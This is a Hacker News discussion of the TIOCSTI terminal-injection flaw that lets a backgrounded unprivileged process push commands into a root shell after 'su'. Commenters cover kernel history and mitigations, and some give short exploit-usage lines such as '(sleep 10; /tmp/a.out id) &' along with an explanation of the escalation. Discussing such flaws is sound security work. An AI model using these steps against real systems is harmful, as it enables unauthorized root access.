Hacker News new | comments | show | ask | jobs | submit login
Ancient “su – hostile” vulnerability in Debian 8 and 9 (ludost.net)
145 points by l2dy 4 months ago | hide | past | web | favorite | 52 comments



For those unaware, ioctl(TIOCSTI) allows injecting characters back into the tty, where they will be read by the next process to read from the terminal. In this case, that process is the root shell that execed su.


I guess you're the right person to ask - why hasn't this just been ripped out of the likes of OpenBSD?

edit: seems it already has! https://marc.info/?l=openbsd-cvs&m=149870941319610


Another variant of using TIOCSTI with poor permissions. FWIW this exact same bug impacted Docker and LXC at various points. In the case of lxc-attach, when stdio is connected to a TTY, it creates a new pty within the container and multiplexes between them to avoid the issue. I don't think there is a single legitimate use for that ioctl.. it should just die already

tl;dr passing a TTY with stopped privileged jobs reading from it (like an interactive root shell) into an unprivileged location is deadly, as the unprivileged location can use TIOCSTI to load up the TTY's input buffer and then exit, causing the stopped jobs to read that input when they're resumed


"Terminal I/O Control - Simulate Terminal Input" ah okay


Yes, I think this is exactly right. su(1M) and sudo(1M) should create a pty to run the child in. And this ioctl should go.


PaX/grsecurity has mitigation to this issue, at least for 10 years.

From grsecurity's config for GRKERNSEC_HARDEN_TTY.

    | There are very few legitimate uses for this functionality and it
    | has made vulnerabilities in several 'su'-like programs possible in
    | the past.  Even without these vulnerabilities, it provides an
    | attacker with an easy mechanism to move laterally among other
    | processes within the same user's compromised session.
Has one run a grsecurity kernel, the system would not be affected.

Some independent developers and KSPP people are also trying to submit this mitigation to the mainline kernel for many years, but so far none of the patch went into the kernel. Since grsecurity is now a private product, you may want to check them out and apply this mitigation to the mainline kernel.

    [PATCH] drivers/tty: add protected_ttys sysctl
* https://gist.github.com/thejh/e163071dfe4c96a9f9b589b7a2c24f...

    tiocsti-restrict : make TIOCSTI ioctl require CAP_SYS_ADMIN
* https://lwn.net/Articles/720740/


I'm increasingly feeling that terminals and bash are just too complex and have too many edge cases and footguns and that we'd be better of just starting over with something were security was a focus from day zero.


Yep. Unix has zillions of ways for processes to interact with each other, which makes for an enormous attack surface. The future is something like unikernels on the server and something like Qubes running them on the desktop, so that each "process" is properly isolated and can only communicate through channels that are deliberately designed for it.

We're going to have to rediscover how we do things like pipelines in a safe way, but the current unix design of small processes interacting via unstructured interfaces that mingle commands and data is just untenable.


They fixed a lot of stuff in plan 9 and it's a pleasure to tinker with. Everything is partitioned in namespaces to isolate processes. Since the entire system is file system based, you manipulate the process namespace which is really just a file that lists the mounts and binds which build that namespace file system. Binds and unions are a blessing and eliminate the headache of environment variables. Every object is a file and everything is communicated via the network transparent in-kernel file protocol, 9p. And because of that, Plan 9 is fully distributed.

For example: I can share the internet without a router or nat by exporting my internet facing ip stack and mount it on the machines needing net access. As far as the isp knows, a single machine is talking to it. I can do the same with file systems, file servers, network cards, sound cards, disks, usb devices, etc.

It's far from usable in production and 9p is a dog over high latency links. but the ideas it has are simple yet brilliant. Best distro to check out for newcomers is 9front (they're silly fellows but don't let that fool you. serious top notch hackers that lot.)


Because newer software has less bugs and is more secure?

I doubt that.


Actually, refactoring a somewhat larger internal project in Google to a different language+architecture served us as a pretty good code review + self security audit. Yes, there was some turbulence at the beginning, but in the end it turned out to be way better understood/tested project.

I believe every project should be re-written every 4-5 years, it becomes less and less expensive to maintain it on the long run. Also keeps workers morale and promotion cycle healthy.

Unfortunately, not all companies have resources AND structure to put that resources in refactoring something that already works.


Has that project been subjected to the greater world of people who don't think like Google programmers? Internal projects always suffer from groupthink.

Don't get me wrong, I love internal projects because once you're behind the gate, they are the first things I probe and attack. Usually very easy targets.


This explains the problem a little clearer I think: https://bugzilla.redhat.com/show_bug.cgi?id=173008


So if I understand correctly, the issue is that when su-ing to more restricted privileges a hostile program (immediately executed via -c) can use TIOCSTI to inject commands which will escape su and execute as the more privileged user?

Is that also an issue using `su; ./hostile; exit`?


No, but it is with

    ( sleep 10 ; hostile ) &
    su
The problem exists when an process with superuser privileges is running a program that reads command input interactively from the terminal at the same time that an unprivileged process has an unrevoked open file descriptor to the same terminal device.


You mean su to root? The same mechanism still exists, though root already has other powers.


No, I mean su to a new shell and execute a command there rather than su -c.


That would be weird if "su -c" was vulnerable but interactive "su" was not. The former is much easier to fix.

In fact, "su" in Debian (which the subject of the submitted article), calls setsid() when you use -c, which defeats TIOCSTI.


> That would be weird if "su -c" was vulnerable but interactive "su" was not.

Not necessarily, if TIOCSTI just pushes stuff to the term input buffer, this is going to get popped on the next prompt of su, so on an interactive su it's not going to be executed under escalated privileges but is instead going to be executed as the same user that executed the hostile program, while with a non-interactive su it's going to get popped on the next prompt of the su caller and thus get escalated privileges.

That's my understanding of it anyway, I could be completely off.


I see what you mean.

Yes, the exploit won't work if the payload is read by the attacker's shell, rather than the root shell. But it's easy to ensure that this won't happen. The laziest way is to kill the shell before issuing TIOCSTI ioctls. :-)


As I remember, `login` program (that asks for your login and password on terminal) does a "virtual hangup" to prevent such things.


Well, on *BSD the way this works is that when the session leader exits the pty/tty will internally call vhangup(2), which in turn does all that revoke(2) does on the tty FD plus it sends SIGHUP to any processes with that tty as the controlling tty.

Linux for a long time had nothing like this. It has a vhangup(2), but looking at its implementation it doesn't seem to do what the BSD vhangup(2) does by calling revoke(2): replace all open file descriptors pointing to the tty with one that returns EIO for read(2)/write(2)/etc.

Linux does NOT have a revoke(2), or at least I can't find it. There was a patch for that back in 2006 and 2007. I don't know what happened to that.

EDIT: Some trivia as well. On BSD SIGHUP is generated by the tty. On Linux and Solaris/Illumos it's only generated by the session leader process on exit, and only if it wants to. This is how bash's disown builtin works: it just doesn't HUP the disown background jobs. The C shell (csh) historically never generated SIGHUP because it's a BSD shell. Back in the early aughts there was some controversy where csh users wanted OpenSSH's sshd to close a session when the pty session leader exits, as otherwise the session would stay open indefinitely. The OpenSSH developers feared this would lose data, and they were right. The source of this problem was that csh wasn't generating SIGHUP on Solaris and Linux, so background jobs stayed alive and held an open file reference to the pty, which meant that they kept sshd from seeing EOF on the ptm, so sshd would not terminate the session as long as those bg jobs stayed alive. This is all still the case today.


When a tty is hung up on Linux, the file operations of all open file structures associated with it are replaced with hung_up_tty_fops, which means all subsequent read(2) returns 0 (EOF), write(2) returns EIO and ioctl(2) returns ENOTTY or EIO.

This is basically a tty-specific implementation of revoke(2).

Also, when the session leader exits on Linux, the kernel does send SIGHUP and SIGCONT to session leader's process group and the foreground process group (this is in tty_signal_session_leader()).


Oh, that must be pretty new (relative to the early aughts anyways). Sorry I missed it.


Oooh so thats why my terminals would get hungup on linux machines when I logged out with a bg job.. and why I haven't seen it since switching to MacOS or OpenBSD for most logins to other systems :)

thanks :D


You're welcome.

I think it's pretty shocking that there's not yet a revoke(2) for all these systems. If there was, then sshd could revoke(2) the pts when the session leader exits, then wait for EOF, and then close the session.

Also, please stop using the C shell. It's a shell that sucks. Granted, they all kinda suck, but the C shell more than all the rest. :)

EDIT: Oh, and to be clear, this is about the server-side of ssh. That you're using OS X on the client-side makes no difference.


That would be rather inconvenient here, as you would return to the root shell and find it unresponsive to input.


Ah, this looks like the old ungetc() exploit, where (back in the 1980s at utexas.edu) we'd leave a process connected to a terminal, wait for another user to log in, then push characters to their shell from our program using ungetc(). Essentially, each character pushed ends up looking like a fresh input character to the other program. The basic issue is whether all open file handles that shouldn't be there (our hack program, for example) got closed out by the new login session. For something like login, the question is easy, ONLY itself should be connected early on. For su, it's much weirder, since the user may have created background jobs before running su, and su and sudo can't reasonably close all other handles on the original tty device.

Further su and sudo can't close all file descriptors of the "sub-session" as it exits, because that the "sub-session" is created by forking, so su/sudo aren't around at the end.

Creating a separate pseudo-terminal device to allow for draconian cleanup, and prevent even having both user IDs connected to the same tty device, seems like the best place to start.

Hmm, now I want to go update the user-group-setter program I use (which also can set auth user IDs on Solaris, etc) and try having it do ptty allocation for the subjob.

In the meantime, try this to get a session and run through the same demo steps:

    setsid -w su - <user>
Won't for everything (no /dev/tty), but it does block the example. You can add a tty if you have one handy, too, by using redirection in the spawned process in this general form, but I don't currently have the cluon for how to create a /dev/pts/<num> from the shell level - if someone can construct the full command, I'd like to see it :-)

    setsid sh -c 'exec command <> /dev/tty2 >&0 2>&1'


> su/sudo aren't around at the end.

Yes, they are. The world has changed since the 1980s. This particular aspect changed in the middle 1990s.

* http://jdebp.eu./FGA/dont-abuse-su-for-dropping-privileges.h...

There are plenty of tools for manipulating pseudo-terminals, but the correct solution here, that people have been pressing for for quite a number of years now and that some kernel people have already implemented, is to simply remove this ioctl() entirely. setsid() is incorrect for the reasons that Karel Zak alluded to in June 2017, and the work to patch the few users of TIOCSTI such as the C shell and mail has already been done by the OpenBSD people.

* https://news.ycombinator.com/item?id=17312775

* http://jdebp.eu./Softwares/nosh/guide/commands.html#ChainLoa...

* http://jdebp.eu./Softwares/djbwares/


> I don't currently have the cluon for how to create a /dev/pts/<num> from the shell level

As I recommended in http://www.openwall.com/lists/oss-security/2018/06/14/2 , use screen or tmux:

  screen su - <user>
script(1) is more lightweight than screen/tmux, but it can't be easily persuaded to run arbitrary commands, such as "su". :-/


How is persuading script to run su not easy? I just tried script -c su /dev/null and it worked as I expected. (/dev/null is there to prevent script from logging the interaction to a file)


D'oh, you're right. I don't know how I missed this option.



Posix TTY and more precisely stdin/stdout/stderr inheritance and internals of FD have a completely insane design. There is the famous divide between file descriptors and file descriptions. Hilarity can and will ensue in tons of domains. I nearly shipped some code with bugs because of that mess (and could only avoid those bugs by using threads; you can NOT switch your std fd to non-blocking without absolutely unpredictable consequences), and obviously some bugs of a given class can create security issues. Especially, and in a way, obviously, when objects are shared across security boundaries.

Far is the time when Unix people were making fun of the lack of security in consumer Windows. Today, there is no comprehensive model on the most used "Unix" side, while modern Windows certainly have problems in the default way they are configured, but at least the security model exist with well defined boundaries (even if we can be sad that some seemingly security related features are not considered officially as security boundaries, at least we are not deluding ourselves into thinking that a spaghetti of objects without security descriptors can be shared and the result can be a secure system...)


There is a model, it's just not particularly well publicised: a file descriptor is a capability.

That's it.


Is it efficient and sufficient though? And can and do we build real security on top of it?

This issue shows systems have been built for decades with blatant holes because it was not taken into account in even core os admin tools.

There is the other problem corresponding to the myth that everything is a fd. Which has never been true, and is even less and less as time passes.

Also, extensive extra security hooks and software using them are built, but not of top of this model.

Finally, sharing posix fd across security boundaries often causes problems because of all the features available for both sides, for which the security impact are not studied.

A model just stating that posix fd are capa is widely insufficient. So if this is the only one, even in the context in pure Posix we already know this is an extremely poor one.


Nobody else has pointed this out (!): whatever platform is running at this URL doesn't sanitize input.

Notice how the C #includes seem to be including emptiness. Well, <stdio.h> et al weren't stripped; they're still in the source code, un-converted < > (ie NOT converted to &lt; &gt;) and all.


We used TIOCSTI to attack Unix terminal sessions left open to “write” — in 1985. I was wondering when/if this would show up again!



Usually when something is reported as being a distribution bug, it's because they have some patch specific to their packages that causes the issue.

Is that not the case here? Are other distrbutions affected right now?


I say it again: This is a kernel mechanism.

Every operating system based upon Linux provides programs with this mechanism. This is not some ioctl() introduced by a Debian patch. This is a mechanism added to Linux by Linus Torvalds on 1993-12-23.

* http://repo.or.cz/davej-history.git/commitdiff/9d09486414951...

Pete French added it to FreeBSD against his better judgement on 2010-01-04. It might have been in an earlier implementation of the terminal line discipline, too.

* https://github.com/freebsd/freebsd/commit/74b0526bbe6326adb7...

OpenBSD, which no longer implements the kernel mechanism, had had it since the initial import from NetBSD in 1995.

* https://github.com/openbsd/src/blob/df930be708d50e9715f173ca...

Illumos has it, and has had since at least the OpenSolaris launch.

* https://github.com/illumos/illumos-gate/blob/9a2c4685271c2f0...

It was even in 4.3BSD.


Debian uses su implementation from the shadow package: https://github.com/shadow-maint/shadow

I suspect most other distros use the one from util-linux.


Just tested this out, can confirm it works on Debian 7 as well. Genius little trick! Not sure about practical exploitation, though.


I'm not a shell pro; what is happening on the sleep line?


$ (sleep 10; /tmp/a.out id) &

$ -> the end of the prompt of a "normal" (i. e. non-root) user

() -> run everything inside in a forked subshell of the current shell

sleep 10 -> "block"/sleep for 10 seconds via the `sleep` executable in your $PATH

; -> after the left-hand side terminates, proceed with the next command on the right-hand side

/tmp/a.out id -> fork and exec the program located at /tmp/a.out with the literal byte sequence "id" on its argument vector

& -> run this command (the whole subshell that () requests) as a background job

When the user exits the shell that spawned the subshell, the whole process group will receive SIGHUP. The backgrounded subshell will still continue running, and after its `sleep` child process terminates, go on to run `/tmp/a.out`.


Ah thanks, I didn't understand the subshell forking part before.


As far as I understand it:

A background subshell is started that waits 10 seconds and then runs a program with the input "id". That program uses ioctl to send characters to the current TTY.

Since the user exited back to the root shell before the program executed, the `id` command is typed and executed on the root shell.


It's waiting, the "tty" command which is invoked a "a.out" causes the tty to receive the sequence of characters specified -- in this case "id\n". The vulnerability here is that if, as one user, you switch user contexts and then later (10 seconds, in this case, hence "sleep 10") the command interacts with the tty over the file descriptor that had been given to the child process and not killed when you exited the shell that spawned it.


It runs the command in a (subshell), in the background&.

This is to make the process survive the subsequent logout.

Because this process inherited terminal fds from the parent, it can continue accessing the logged out terminal (now root).


Lol. Thanks. Work machine. Must have ctrl-tabbed without realizing.


Pretty sure you're in the wrong thread, mate.


I guess they ctrl-tabbed without realising it...




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: